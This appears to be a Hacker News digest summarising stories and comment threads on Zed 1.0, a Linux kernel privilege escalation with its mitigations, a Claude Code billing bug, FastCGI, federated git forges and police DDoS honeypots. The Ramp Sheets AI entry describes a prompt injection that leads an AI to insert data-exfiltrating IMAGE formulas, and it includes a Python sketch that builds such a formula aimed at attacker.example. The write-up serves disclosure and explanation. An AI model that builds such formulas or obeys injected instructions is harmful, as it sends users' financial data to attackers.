Hacker News

Zed, the GPU-accelerated code editor built in Rust by the creators of Atom, has reached version 1.0 after five years of development. Rather than building on Electron or web technology, Zed created its own UI framework (GPUI) that renders via GPU shaders, enabling exceptional performance across Mac, Windows, and Linux. The 1.0 release spans over a million lines of code and covers multi-language support, Git integration, SSH remoting, and debugging. Zed is AI-native from the ground up, supporting parallel agents, keystroke-level edit predictions, and the Agent Client Protocol (ACP), which integrates external agents including Claude, Codex, OpenCode, and Cursor. The team is also launching Zed for Business with centralized billing and role-based access controls. Looking ahead, DeltaDB — a CRDT-based synchronization engine — is in development to enable character-level collaborative editing between humans and AI agents, a capability the team argues is impossible without owning the full stack.

Comments: User reception is broadly positive on speed, with many migrating from JetBrains, VS Code, and Sublime Text, though notable concerns temper enthusiasm. A prominent issue is the license agreement granting Zed broad rights to process customer data including source code. Technical complaints include search results opening in new tabs instead of a sidebar, confusing multi-agent/worktree UX around branch ownership, non-Latin keyboard shortcut failures on Linux, and extensibility requiring Rust even for language servers. Missing features noted include screen reader support, Python notebook support, PDF preview, and call hierarchy. Some users report LSP extensions silently failing on first run, and persistent longstanding bugs despite 1.0 — with critics arguing AI features were prioritized over stability. The GPUI framework draws admiration as a potential standalone Rust UI library. Praise centers on startup speed, low memory usage, vim mode quality, and strong out-of-the-box defaults, with many calling it the first editor to displace Emacs or Sublime for daily use.

CVE-2026-31431, "Copy Fail," is a Linux local privilege escalation found by AI tool Xint Code in roughly one hour. Unlike typical LPEs requiring race conditions or kernel-specific offsets, this straight-line logic flaw in authencesn AEAD handling chains through AF_ALG sockets and splice() into a 4-byte page-cache write, requiring only an unprivileged local user. A 732-byte Python 3.10+ script works unmodified across all mainstream Linux distributions with kernels built between 2017 and the patch, confirmed on Ubuntu 24.04, Amazon Linux 2023, RHEL 10.x, and SUSE 16. The attack surface spans shared dev boxes, CI runners, container hosts, and any multi-user kernel environment. Mitigation includes disabling algif_aead via modprobe, blocking AF_ALG via seccomp, or applying mainline kernel commit a664bf3d603d, which reverts the 2017 in-place algif_aead optimization. The PoC is published for defenders to verify systems; the same scan surfaced additional high-severity bugs still under coordinated disclosure.

Comments: Users widely confirm instant root shells on unpatched systems including recently updated Ubuntu 24.04. The page references "RHEL 14.3," which doesn't exist (current RHEL is 10.x), widely attributed to AI-generated content. Red Hat and Debian have labeled the issue "moderate severity" with fixes deferred, which users find inconsistent with its impact. On RHEL 9/10, algif_aead is compiled into the kernel, making the modprobe mitigation ineffective; systemd service drop-ins are suggested as an alternative. The exploit doesn't escape rootless Podman containers or work unmodified on Alpine Linux, which lacks world-readable setuid binaries; a working Alpine variant requiring /bin/ping has been shared. Users advise against running the obfuscated PoC directly and offer a readable Python one-liner to safely check module availability. Discussion covers Android exposure, the systemic problem of world-readable SUID binaries enabling LPEs, and the significance of an AI tool uncovering a nine-year-old critical kernel bug in roughly one hour.
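The availability check the commenters describe can be sketched in Python. This is an illustrative version, not the one-liner from the thread; it only probes whether the kernel exposes AF_ALG AEAD sockets, without touching the vulnerable code path:

```python
import socket

def algif_aead_available():
    """Return True if the kernel exposes AF_ALG AEAD sockets (algif_aead)."""
    if not hasattr(socket, "AF_ALG"):
        return False  # non-Linux platform or an old Python build
    try:
        s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
    except OSError:
        return False  # AF_ALG family blocked or unsupported
    try:
        # Binding to an AEAD algorithm succeeds only if algif_aead is present,
        # whether loaded as a module or compiled into the kernel.
        s.bind(("aead", "gcm(aes)"))
        return True
    except OSError:
        return False
    finally:
        s.close()
```

Note that on RHEL 9/10, where algif_aead is built into the kernel, this returns True even though the modprobe mitigation has no effect.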

A GitHub issue revealed that Claude Code (v2.1.119) routes API requests to "extra usage" billing instead of the included Max plan quota when "HERMES.md" appears in recent git commit messages. The bug affected a Max 20x plan subscriber ($200/month) who consumed only 13% of weekly capacity but was charged $200.98 in extra usage. The trigger is specifically the string in commit history — not a file on disk — and is case-sensitive: lowercase "hermes.md," "HERMES" alone, and "HERMES.txt" don't trigger it. Claude Code includes recent commits in its system prompt, and something server-side routes differently when HERMES.md is detected. The user identified the cause through systematic binary search, testing orphan branches and isolating individual commit strings. Initial Anthropic support denied compensation for technical errors — later confirmed to have been an AI-generated response. Thariq from the Claude Code team announced full refunds plus bonus credits equal to each affected user's monthly subscription. Anthropic attributed the root cause to "an overactive anti-abuse system" that has since been fixed.

Comments: An Anthropic employee confirmed the initial "no compensation" response was generated by Claude, not a human, and a Claude Code team member publicly announced full refunds plus bonus credits for all affected users. Many commenters share similar billing experiences — double and triple charges — mostly resolved only through credit card chargebacks after Anthropic support failed to help. Some speculate the HERMES.md detection was an anti-competitive mechanism targeting Nous Research's open-source Hermes AI agent, though Anthropic attributed it to an overactive anti-abuse system. Critics highlight the irony of an AI company using AI bots to deflect billing complaints, with users describing those interactions as useless and brand-damaging. Broader frustration covers perceived model quality decline, difficult onboarding, and unresponsive customer service. Several users announced switching to OpenAI Codex, citing billing unpredictability. Calls for legislation mandating human-accessible billing support appeared frequently, and a minority urged calm, noting the refund came within days of the bug surfacing publicly.

Rheinmetall, Germany's largest defense firm, has dramatically scaled up ammunition and military equipment production, with CEO Armin Papperger claiming Germany now surpasses the United States in conventional ammunition production capacity. Artillery shell output grew from 70,000 to 1.1 million per year, medium-caliber ammunition from 800,000 to 4 million, and military trucks from 600 to 4,500 annually. The company received 350,000 job applications in 2025 alone, currently employs 44,000 people (targeting 70,000 by 2030), and works with 11,500 German suppliers—4,500 of which also serve the automotive sector. Papperger suggests arms production could replace roughly a third of jobs lost in Germany's declining automotive industry. This expansion aligns with Germany's first-ever official military strategy naming Russia the primary threat to European security, with Berlin aiming to build Europe's most powerful conventional army.

Comments: Commenters question the production comparisons, pointing out that North Korea's estimated output of 2 million 152mm artillery shells per year appears to exceed Germany's 1.1 million, undermining the "largest producer" claim and highlighting the need for contextual clarity around calibers, stockpiles, and whether rates are monthly or annual. The US figure of roughly 672,000 shells annually does confirm Germany's lead over America. Several observers invoke Germany's militaristic history with pointed skepticism. A prominent critique argues Germany is investing in legacy artillery while modern warfare has shifted toward drones—China has reportedly procured 1 million kamikaze strike drones and the US is pursuing $55 billion in drone investment—though some note this ammunition ramp-up was likely funded in 2023–2024 before drone dominance became strategically undeniable, and that future procurement decisions would likely look quite different.

FastCGI, 30 years old, solves two critical HTTP security problems in reverse proxy-to-backend communication. HTTP/1.1's ambiguous message framing enables desync/request-smuggling attacks where proxy and backend disagree on message boundaries — a recurring vulnerability despite patching efforts. FastCGI uses explicit framing; HTTP/2 also fixes this but has far less proxy support (nginx only added HTTP/2 backend support in late 2025, Apache's remains experimental). HTTP also lacks structural separation between trusted proxy-injected headers and untrusted client headers, allowing spoofing of X-Real-IP or True-Client-IP. FastCGI solves this by prefixing client HTTP headers with "HTTP_", with REMOTE_ADDR automatically populating Go's http.Request.RemoteAddr. Major proxies (nginx, Apache, Caddy, HAProxy) support FastCGI, and Go's stdlib makes switching as simple as replacing http.Serve with fcgi.Serve. Downsides include no WebSocket support, inferior tooling (curl cannot make FastCGI requests), and unoptimized throughput on some workloads. The author has run FastCGI in production for over 10 years and advocates adoption despite its vintage status.
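The trust separation the "HTTP_" prefix buys can be shown in a short Python sketch. The helper below is hypothetical (it mirrors the CGI/FastCGI convention rather than any particular library's API):

```python
def fcgi_params(client_headers, remote_addr):
    """Build CGI/FastCGI-style params. Server-set variables like REMOTE_ADDR
    live in a namespace client headers can never reach, because every
    client-supplied header is prefixed with HTTP_."""
    params = {"REMOTE_ADDR": remote_addr}
    for name, value in client_headers.items():
        params["HTTP_" + name.upper().replace("-", "_")] = value
    return params

# A client trying to spoof its address only produces HTTP_REMOTE_ADDR;
# REMOTE_ADDR stays whatever the proxy observed on the wire.
params = fcgi_params({"Remote-Addr": "1.2.3.4", "Host": "example.com"}, "10.0.0.7")
```

This is the structural fix: spoofing is impossible by construction, not by a proxy remembering to strip headers.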

Comments: Commenters surface alternatives: one contributor describes Web Application Socket (WAS), designed 16 years ago, using a control socket plus two pipes enabling splice() and request cancellation, with open-source implementations including a PHP SAPI and web server. Others reflect on the HTTP vs. FastCGI/SCGI wars, arguing HTTP won by embodying the End-to-End Principle — flexible multi-layer proxies without a new protocol — though at cost of Principle of Least Privilege security. Several flag uWSGI as overlooked. One commenter pushes back that HTTP/2 fixes framing equally well while preserving browser testability, questioning FastCGI's tradeoffs. Others share nostalgia for Perl+FastCGI setups and note FastCGI's process orchestration role (auto-scaling, crash recovery). WebSocket limitations are acknowledged; WHATWG streams over long-lived HTTP are suggested as a workaround with backpressure benefits. WebTransport is mentioned but deemed not a true replacement. A few report negative experiences with FastCGI on Windows/Apache stacks, while one describes using plain CGI for agent-generated custom pages leveraging Go's stdlib support on both sides.

Neal Agarwal has launched a new multiplayer cursor-based interactive playground on neal.fun, where visitors from around the world share a whimsical virtual space and interact in real time through their cursors. The world features activities including beach volleyball, soccer, a pool with a diving board, a stage for impromptu dance parties, a cave with a flashlight effect, a waterfall, a DJ booth, and a beach yurt serving mushroom soup. Players can earn nine badges — Cannonball!, Treasure Hunter, Goal!, S'more Please, Cat Person, Take a Seat, Slide!, Beachcomber, and Green Thumb — by discovering hidden interactions. Technical highlights include use of Rive for animation, country-based player detection that differs from standard GeoIP, and mobile support, though some devices heat up under sustained use. One friction point noted is that re-implementing mouse movement introduces sensitivity problems on trackpads.

Comments: Commenters describe spontaneous joyful moments — beach volleyball games, soccer matches, and dance parties with strangers worldwide — and draw strong comparisons to Club Penguin. A ROT13-encoded badge guide circulated in the thread helps players find hidden activities without spoiling discoveries. Technically minded users confirm the project uses Rive for animations, observe that country detection doesn't rely on standard GeoIP, and note mobile compatibility works but causes iPhone heat buildup. One user flags that re-implementing mouse movement creates frustrating cursor sensitivity issues on trackpads, and another requests better two-finger tap support for right-click menus. Several commenters suggest adding small custom avatars to make social interactions feel more personal than plain cursor icons. The experience draws nostalgia for early internet culture, Living Books CD-ROMs, and Homestar Runner Easter eggs, with many expressing it proves the internet can still foster genuine human connection.
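For anyone who wants to read the badge guide without decoding by hand, Python's codecs module handles ROT13 directly. The encoded string below is an illustration built from one badge name in the article, not text from the actual thread:

```python
import codecs

# ROT13 shifts each letter 13 places, so decoding and encoding
# are the same operation.
print(codecs.decode("Gernfher Uhagre", "rot13"))  # -> Treasure Hunter
```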

Gooseworks, a 3-person startup from the founders of Athina AI (used by Perplexity, Doximity, and others), is hiring a Founding Growth Engineer to build and operate AI-powered growth engines for customers using their "Goose" platform. The role splits roughly 50/50 between running real GTM work for customers (outbound, SEO/AEO, Reddit, influencer marketing, content) and R&D to convert those one-off engagements into templatized, self-serve playbooks that Goose agents run autonomously. Goose is described as an OpenClaw-style AI coworker with its own filesystem, memory, email, accounts, and integrations, reachable via Slack, Telegram, or email like any human coworker. Their thesis is that GTM/growth work is undergoing the same transformation coding did three years ago, with orchestration and workspace context being the bottleneck rather than model capability. The target customer is founders, GTM engineers, and growth operators at fast-growing startups who want 10x execution speed. The ideal candidate has measurable, compounding growth results from prior startups or agency work—viral launches and Product Hunt wins explicitly don't meet the bar.

Comments: Nothing to summarize!

Haskell earns praise for its powerful type system, algebraic data types, monads, and popularizing mathematical concepts in programming, but proves frustrating for rapid prototyping due to monadic abstraction overhead, strict pure/impure separation, and complex dependency management. The author describes spending hours wrestling with Haskell's XML libraries where a JVM solution would take minutes, ultimately abandoning the prototype entirely. Scheme (specifically GNU Guile) is preferred for its interactive REPL via SWANK-style integration—enabling live debugging, incremental development, and function redefinition without restart—and its flexible macro system that allows metaprogramming with far less ceremony than Haskell's Template Haskell. Haskell's DSL-heavy Hackage ecosystem (Parsec, Servant, etc.) imposes steep, inconsistent learning curves across libraries, while Lisp's s-expressions provide a unified data representation model. The author frames Haskell as a "platonic ideal" illuminating functional programming theory but too rigid for most practical work, while acknowledging Scheme's weaker enterprise ecosystem versus JVM alternatives.

Comments: Commenters broadly support pragmatism over purity while adding nuance. Several advocate Racket as a more accessible Lisp with a large standard library, noting most Racket developers never need to write macros since the standard library already provides them, and that s-expressions offer a superior alternative to XML and JSON for data representation. Clojure is suggested as a JVM-based bridge between Lisp flexibility and enterprise ecosystem. One lengthy critique argues Haskell's real barrier is its confusing "word salad" syntax—user-invented infix operators, overloaded literals, bizarre indentation rules—rather than monads, contrasting SML and Erlang as cleaner alternatives; SWANK is cited as Lisp's true killer feature for live-program interactive editing, a workflow lost in batch-oriented mainstream languages. A mild plagiarism concern is raised over similarity to a 2012 HN post with the same thesis. Others mention Chicken Scheme, S9 Scheme, and Forth as practical alternatives, and Coalton is suggested as a Haskell-like language that runs on Lisp.

A webpage attempts to illustrate Monero's core privacy feature by presenting a specific Monero wallet address and noting that any attempt to view its balance is futile — Monero's protocol by design hides transaction amounts and balances from outside observers, unlike transparent blockchains such as Bitcoin. The address shown (47xmhb...S7Fyv2) is not random; it belongs to The Rage, an independent journalism outlet, and is used for public donations. The page's tone is sardonic, framing the privacy block as Monero "saying no" to snooping, effectively serving as both a demonstration and a soft advertisement for Monero's anonymity guarantees.

Comments: Commenters are largely dismissive of the page itself, calling it clickbait, and at least one notes the site appeared to be down at time of access. The most substantive comment identifies the Monero address as the donation wallet for The Rage, a journalism outlet one commenter describes as doing quality work, pointing to their official donations page at therage.co/donate. No technical debate about Monero's privacy model emerges in the comments.

The content catalogs roughly 30 foundational UX and cognitive psychology principles as brief one-sentence definitions, covering interaction design (Fitts's Law, Hick's Law, Doherty Threshold <400ms), visual perception via Gestalt principles (proximity, similarity, closure, common region, uniform connectedness), and memory constraints (Miller's 7±2 items, serial position effect, working memory, Zeigarnik Effect). Behavioral patterns include the Pareto 80/20 rule, Parkinson's Law, goal-gradient effect, and peak-end rule. Other entries cover Jakob's Law, Tesler's Law of Conservation of Complexity, Von Restorff isolation effect, Occam's Razor, Postel's Law, aesthetic-usability effect, cognitive bias, cognitive load, mental models, flow state, chunking, selective attention, and poka-yoke error-proofing (on the premise that users skip manuals). The collection is formatted as a poster-style visual reference aimed at designers and developers seeking a consolidated checklist of established UX principles.
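Several of these laws are quantitative rather than qualitative; Fitts's Law, for instance, predicts pointing time from target distance and width. A minimal sketch, where the a and b coefficients are device-dependent placeholders rather than values from the poster:

```python
import math

def fitts_time(distance, width, a=0.2, b=0.1):
    """Shannon formulation of Fitts's Law: MT = a + b * log2(1 + D/W).
    Bigger or closer targets are faster to hit; a and b are fit per device."""
    return a + b * math.log2(1 + distance / width)

# Doubling target width lowers the index of difficulty,
# and with it the predicted movement time.
wide = fitts_time(512, 64)
narrow = fitts_time(512, 32)
```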

Comments: Commenters are split: some appreciate the poster format and note many laws trace to Nielsen Norman Group research, while others criticize entries like "Cognitive Bias" as bare dictionary definitions rather than actionable rules, suggesting the collection was assembled to sell posters. A practical use case has users feeding these laws into AI tools like ChatGPT and Claude for automated UX review, with shared before/after dashboard redesigns showing real improvements. The Doherty Threshold (<400ms) sparks debate about preferring smaller, faster AI models for programming to sustain real-time engagement, with one commenter redefining "best model" as the smallest, cheapest one that reliably completes the job. Community-proposed additions include UI stability, avoiding meaningless icons, and restoring default scrollbars. One user found a prompt injection hidden in the site's HTML instructing AI to generate a sea shanty. Irony is noted in the UX laws site itself lacking a two-pane scroll layout, and a commenter observes engineers are culturally discouraged from expressing the user frustration that defines bad UX.

A vulnerability in Ramp's Sheets AI allowed indirect prompt injections hidden in externally sourced datasets to manipulate the AI into inserting malicious formulas that silently exfiltrate financial data with no user approval. The attack embeds white-on-white hidden text in an imported dataset, instructing the AI to collect sensitive data and build an IMAGE formula pointing to an attacker URL with the victim's financials appended as query parameters—which fires automatically. PromptArmor disclosed the issue to Ramp on February 19, 2026, but received no response until March 14 after two follow-ups; Ramp attributed the delay to a transition between disclosure programs and confirmed a fix on March 16. A nearly identical flaw was previously found in Claude for Excel; Anthropic remediated it with a red warning interstitial displaying full formulas before insertion. Ramp's specific fix was not publicly detailed.
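The exfiltration primitive is easy to picture: any formula that fetches a remote resource can smuggle data in its query string. A Python sketch of the formula shape the disclosure describes, with the attacker URL and field names hypothetical:

```python
from urllib.parse import urlencode

def exfil_image_formula(stolen):
    """Shape of the attack: an IMAGE() formula whose URL carries the victim's
    data as query parameters. The sheet fetches the 'image' automatically,
    delivering the data with no user click."""
    return '=IMAGE("https://attacker.example/pixel.png?{}")'.format(urlencode(stolen))

formula = exfil_image_formula({"balance": "1200000", "vendor": "acme"})
```

Anthropic's interstitial mitigation works precisely because it forces a human to read that URL before the formula lands in a cell.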

Comments: Commenters draw a pointed irony: decades of work preventing computers from executing data as instructions are being undone by AI agents designed to do exactly that. Several note the stakes are especially high for fintech—Ramp handles corporate spend data, making financial exfiltration far more serious than leaking a to-do list. Critics flag that PromptArmor had to follow up three times over nearly a month before getting a response, and one commenter notes a likely typo (May vs. March for the resolution date). On the technical side, users observe that the modern tooling ecosystem—npm, pip, cargo—is already built on high-trust, in-band-only signaling, so LLMs inheriting that model is unsurprising; the open question is what Ramp's specific mitigation was versus Anthropic's warning dialog. A dissenting view argues the behavior is expected for any app ingesting untrusted data and questions whether the responsible-disclosure framing is warranted. One commenter says they'll avoid companies using AI internally, viewing it as a marker of desperation.

This open-source project provides freely available plans for a 3D-printed stethoscope validated in a peer-reviewed PLOS ONE study to perform comparably to the Littmann Cardiology III gold standard, with total material cost targeting ~$1-4 USD. Printed components — head, ear tubes, Y-piece, spring, and ring — must be produced in PETG or ABS at mandatory 100% infill with 0.2mm layer height, as any lower infill directly degrades acoustic output. Hardware includes silicone tubing in two diameters (8mm ID/13mm OD and 4mm ID/8mm OD, both 50 durometer), a 40mm diaphragm cut from a ~0.35mm plastic report cover, and standard large earbuds. PLA is explicitly discouraged due to heat deformation and early spring failure. Source files are generated via CrystalSCAD and OpenSCAD, and the project is released under the TAPR Open Hardware License. Assembly involves attaching the diaphragm to the head, routing silicone tubing through the Y-piece, and connecting spring-mounted ear tubes to standard earbuds.

Comments: Commenters question the peer-reviewed results, noting that no acoustic engineering or modeling was performed and that 3D-printed circular tube cross-sections produce internal surface roughness — causing attenuation — and that a "ô"-shaped profile would print more cleanly. Comparable metal stethoscopes are available for $1.22/unit in bulk from Alibaba or ~$7 retail, undercutting the project's cost argument for well-supplied regions. Sterilization is raised as a serious concern: 3D-printed materials contain microscopic pores that caused hospitals to reject printed PPE during COVID-19, and a stethoscope contacts both patients and providers. Single-use plastic stethoscopes already exist for under $2 in bulk. An interview with researcher Tarek Loubani (linked in comments) provides the true motivation: delivering functional medical tools in resource-limited or conflict-affected areas such as Gaza. Users express surprise that brand-name stethoscopes cost $100+ while Littmanns are noted to last 20+ years, and questions are raised about passive vs. active device classification and sterilization protocols.

Postgres lateral joins let subqueries reference preceding FROM clause columns, producing the same query plan as a standard INNER JOIN. This enables composable query DSLs, unlike ORMs (which hide joins but cause painful M2M update bugs) or plain SQL generators (which lack composability). Inspired by Haskell's Rel8, the author built a Rust equivalent where each closure line adds a CROSS JOIN LATERAL and where_ adds a WHERE clause. Expr<'scope, T> uses Rust's borrow checker to prevent expressions escaping their valid scope. User tables use a TableMode GAT that switches field types between &str, raw values, and Expr, with MapTable enabling field traversal without combinatorial trait impls. The library supports aggregations via .aggregate(), left-outer joins via .optional(), and row collection via .many(). Compile-time guarantees ensure only valid SQL is generated. Sea-query serves as the underlying AST builder.
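The equivalence the library leans on can be seen in plain SQL. Below are two Postgres queries over hypothetical users/posts tables, held as Python strings for illustration; a correlated LATERAL subquery may reference columns from the preceding FROM item, which is exactly what makes per-line composition possible:

```python
# The inner SELECT references u.id from the preceding FROM item,
# so each generated closure line can add one CROSS JOIN LATERAL.
lateral_sql = """
SELECT u.name, p.title
FROM users AS u
CROSS JOIN LATERAL (
    SELECT title FROM posts WHERE posts.user_id = u.id
) AS p
"""

# The hand-written equivalent, which Postgres plans identically.
join_sql = """
SELECT u.name, p.title
FROM users AS u
JOIN posts AS p ON p.user_id = u.id
"""
```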

Comments: Users note they independently discovered the lateral join approach when building their own composable query layers, finding it superior to CTEs — which require the query layer to distinguish CTE clauses from regular clauses, resulting in worse ergonomics. The comments confirm lateral joins as a natural, practical fit for composable join abstractions beyond just the theoretical elegance described.

Elsevier removed John Goodell, Editor-in-Chief of RIBAF, in a citation cartel crackdown that already ousted Brian Lucey and Samuel Vigne from five other journals. Goodell's output surged from single digits pre-2021 to 53-58 papers annually, propelled by 125 papers gifted across three journals he co-controlled, pushing his citations to 15,663—with 4,203 earned in 2025 alone, producing the J-curve signature of citation rings. The scheme was an industrial quid pro quo: junior scholars submitted to RIBAF, added Goodell as co-author at other journals, and their submissions were accepted. A network analysis placed Goodell as the most influential researcher among 500 top finance professors in the Elsevier ecosystem. One Edinburgh Napier professor published 22 RIBAF papers in 2024-2025, adding Goodell to 14 papers at other journals, and appears to have scrubbed and quietly restored those publications from Google Scholar. Elsevier's guidelines require editorial recusal for co-author submissions—rules Goodell violated hundreds of times. An estimated 200-350+ RIBAF papers are retraction candidates, but Elsevier appears to be containing the scandal rather than confronting it.

Comments: Commenters broadly view the scandal as symptomatic of academia's overreliance on vanity metrics like H-index and publication counts rather than research quality, calling for tenure committees and funding bodies to reform how scholars are evaluated. Several note Goodell's exponential citation growth was conspicuous enough to invite scrutiny and question whether he genuinely believed the scheme would go unnoticed. Deep frustration with Elsevier and publishers like Springer-Verlag recurs throughout, with some arguing these publishers should be removed from the academic ecosystem entirely, and others feeling less guilty about years of using piracy sites like Libgen. There is curiosity about whether AI language models retain indexed versions of papers researchers tried to scrub from Google Scholar. Some note Elsevier has a documented history of rewarding prolific editors with expanded roles rather than disciplining them. Several observe that three firings barely dents a problem likely involving thousands of participants across the ecosystem. One commenter questions the informal, pithy tone of the piece despite not disputing its factual claims.

Kyoto's cherry blossom peak bloom dates have been recorded since 812 AD, forming what is regarded as the longest continuous record of any natural phenomenon on Earth. Compiled by Yasuyuki Aono from imperial diaries, monastery records, and modern meteorological data — archived at NOAA Paleoclimatology — the dataset reveals a clear climate signal over more than a millennium. For most of that span, peak bloom fell in early-to-mid April, with the Little Ice Age visible as a drift toward later peaks between the 14th and 19th centuries. Beginning around 1900, the 30-year rolling mean fell sharply, dropping below any value recorded during the Heian period. The 2026 peak arrived March 29 — over two weeks earlier than the pre-modern average. Though local to one species in one city, its extraordinary length makes it a uniquely credible climate proxy. The piece also notes that centuries of observation gave Japanese a precise seasonal vocabulary — words like 満開 (mankai, full bloom) and 花吹雪 (hanafubuki, blossom blizzard) — and uses this to promote JIVX, an AI-graded Japanese language app.
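The 30-year rolling mean behind that conclusion is a simple trailing average. A stdlib-only sketch over toy bloom dates expressed as day-of-year (the numbers are illustrative, not values from the Aono dataset):

```python
def rolling_mean(values, window=30):
    """Trailing moving average: one output per full window of observations."""
    return [sum(values[i:i + window]) / window
            for i in range(len(values) - window + 1)]

# Toy data: day-of-year of peak bloom drifting earlier, as in the Kyoto record.
bloom_days = [105, 104, 106, 103, 101, 100, 98, 97, 95, 93]
trend = rolling_mean(bloom_days, window=5)
# Each successive 5-year mean is lower: bloom keeps arriving earlier,
# even though individual years bounce around.
```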

Comments: Commenters largely corroborate the trend with personal observations — earlier blooms on home trees, blossoming periods shortened from a week to three days — while a Midwest user notes a colder-than-average spring as a regional counterpoint. Several call the 1,200-year human-curated dataset itself remarkable and ask whether comparable long-term records exist for other phenomena. The climate framing draws both agreement and pushback: some use sarcasm to mock denial, while others argue humans struggle to reason across long timescales, fueling misplaced skepticism. A few raise complicating factors — urban heat islands in Kyoto, selective breeding of cultivars for earlier bloom, and changes in horticultural practice since 1900 — as alternative explanations. One commenter identifies the piece as a reformatted Our World in Data visualization. Concern about ecological consequences also surfaces, with users questioning impacts on pollinators and tree health over coming years. The comment quality is noted by at least one participant as disappointing overall.

Tangled is a federated Git collaboration platform built on AT Protocol, positioning itself as a GitHub alternative amid recent reliability concerns. Code servers called "knots" use standard git for transfer while AT Protocol handles issues, pull requests, follows, stars, and collaborator invites. Developers can push to their own server and open pull requests against repos on entirely different servers. Social features integrate with the broader Bluesky ecosystem. Active users praise the Spindles CI/CD system, static site hosting, native Jujutsu VCS support, and an open API built on shared AT Protocol standards. Tangled has received seed funding including from Bain Capital Crypto, raising enshittification concerns typical of VC-backed platforms. Critics debate whether AT Protocol is preferable to ActivityPub, modernized email-based workflows like git format-patch, or simply configuring multiple git remotes. Alternatives include ForgeFed, Forgejo's federation roadmap, Nostr-based gitworkshop.dev, and Radicle. Some argue what is truly needed is an implementation-agnostic SDLC API standard rather than another federated transport protocol.

Comments: Commenters raise the "cold start" problem: joining a large server recreates GitHub's centralization, while self-hosting yields zero network and discoverability. Comparisons to Mastodon's federation struggles are frequent, with predictions of defederation politics, spam challenges, and fragmentation. VC backing—including Bain Capital Crypto—draws enshittification skepticism, while AT Protocol draws criticism from those preferring ActivityPub, IndieAuth/OAuth, or pure git-based solutions; one user cites post-quantum cryptography exposure as a technical concern. Alternative approaches suggested include modernized git format-patch workflows, Fossil's embedded issue tracker, GitSocial's git-as-federation-layer, gitworkshop.dev on Nostr, and Radicle. One year-long active user praises Spindles CI/CD, Jujutsu-first support, static site hosting, and Bluesky social graph integration. Others argue forge federation is unnecessary since git remotes are already distributed and OAuth handles single-login. Some users prefer a transport-agnostic SDLC schema standard over yet another protocol, while others question why AT Protocol was chosen over the mature git-over-email workflow.

The Dutch government has launched code.overheid.nl, a self-hosted open-source code platform built on Forgejo, a European alternative to GitHub and GitLab that prioritizes digital sovereignty. The pilot is initiated by the Open Source Program Office at the Ministry of Interior (BZK), in collaboration with DAWO, Opensourcewerken, and developer.overheid.nl, with participation not yet open to all government bodies. A notable early project is "regelrecht," which encodes Dutch legal texts as structured YAML and executes them as deterministic decision logic with full explanation trails. Germany operates a comparable platform at opencode.de (built on GitLab) with hardened container images, while the UK government has catalogued over 17,000 open-source projects. The platform launched to significant public interest, experiencing an HN-driven traffic spike, but issues noted include dark mode readability failures, i18n inconsistencies, residual GitHub references in repos, and a choice to deploy pre-release Forgejo v16 over stable v15.
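The regelrecht idea (law as data plus a deterministic evaluator that emits an explanation trail) can be sketched in a few lines of Python. The rule schema below is hypothetical and uses plain dicts in place of YAML; it is not regelrecht's actual format:

```python
# Hypothetical rule shape: named conditions in, decision plus trace out.
RULE = {
    "name": "rent_allowance",
    "if": {"min_age": 18, "max_income": 30000},
    "then": {"eligible": True},
    "else": {"eligible": False},
}

def evaluate(rule, facts):
    """Deterministic evaluation: same facts always yield the same decision,
    and the trace records exactly which checks fired."""
    cond = rule["if"]
    checks = {
        "age_ok": facts["age"] >= cond["min_age"],
        "income_ok": facts["income"] < cond["max_income"],
    }
    matched = all(checks.values())
    outcome = rule["then" if matched else "else"]
    return {**outcome, "trace": {"rule": rule["name"], "checks": checks}}

decision = evaluate(RULE, {"age": 25, "income": 20000})
# decision["eligible"] holds the outcome; decision["trace"] explains it.
```

Frequent policy amendments, the concern raised in the comments, would amount to versioning these rule documents like any other code.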

Comments: Dutch developers expressed enthusiasm, with several noting years of internal advocacy for government open-source adoption that went unanswered. Users highlighted "regelrecht" — encoding legal texts as YAML decision trees — sparking curiosity about use cases and how frequent policy amendments would be managed. Germany's opencode.de and the UK's 17,000+ government OSS projects were cited as precedents; GitLab's Dutch origins were noted with amusement. Technical critiques included dark mode accessibility failures (dark purple text on dark backgrounds), i18n issues (English default with Dutch content), pre-release Forgejo v16 over stable v15, and residual GitHub links needing cleanup. Broader aspirations for digital sovereignty across operating systems and cloud infrastructure were raised, alongside concerns about replacing one oligarchy with a European equivalent. Interest in cross-jurisdictional coordination to avoid duplicated OSS efforts was also discussed. One comment quipped: "most governments are still in the meeting — the Dutch shipped it and went home for dinner."

Operation PowerOFF is an international law enforcement effort led largely by the Dutch Police targeting DDoS-for-hire services. A researcher found two honeypot sites: cyberzap.fun, a covert fake booter with a realistic dashboard collecting user IPs and emails as evidence, and netcrashers.net, an overt scare-tactic site redirecting visitors to a police warning page. The covert site used bit.nl hosting — a Dutch police telltale — and had only 14 prior "attack" orders, suggesting limited reach. After registering with an obvious research email, the researcher found cyberzap.fun locked with a 401 shortly after probing, along with an unused associated domain. The operation also released an AI-generated video dramatizing a police raid on a teenager for DDoS attacks, dismissed as propaganda. The broader goal appears to be creating suspicion around booter services to deter users beyond just making arrests. Operation PowerOFF used similar infiltration tactics before, documented by the UK's NCA in 2023. Cyberzap.fun was registered April 3, 2025 but was empty when archived in July 2025, raising questions about its actual launch.

Comments: Commenters largely challenge the author's framing. On the claim that the site shutdown was caused by his probing, skeptics argue a WAF rule blocking his IP is far more plausible than law enforcement "panicking," calling out the author for excessive self-credit. Critics also push back on the notion that creating suspicion in the DDoS-for-hire community is harmful — pointing out that this "community" is mainly kids wanting to knock game servers offline, making police disruption a good outcome. The author's assertion that the honeypots have "no real impact" is questioned, given that Operation PowerOFF has shut down dozens of booter sites and may have deterred or warned off numerous potential customers. One commenter notes the site technically qualifies as a genuine honeypot by definition. The thread draws an ironic parallel between the author's criticism of law enforcement self-promotion and his own self-congratulatory post, suggesting both share the same impulse.

A post by @GlennMeder on X (inaccessible without JavaScript) argues mandatory online age verification is a trojan horse for mass surveillance, warning that identity infrastructure will ultimately require all users to prove who they are before accessing websites or apps. The post claims children will lose the ability to explore or speak freely online without permanent logging. This is debated against accelerating legislation: the UK's Online Safety Act is in effect, Australia has social media age limits with influencer loopholes, and Greece has reportedly moved to ban online anonymity entirely. Technical alternatives cited include zero-knowledge proofs, fully homomorphic encryption, anonymous credential systems, RTA content headers, and Estonia's hardware-key identity model. Critics argue parental responsibility — not surveillance infrastructure — should govern children's internet access, while supporters contend age verification for social media and pornography reasonably extends existing regulations around gambling and alcohol.

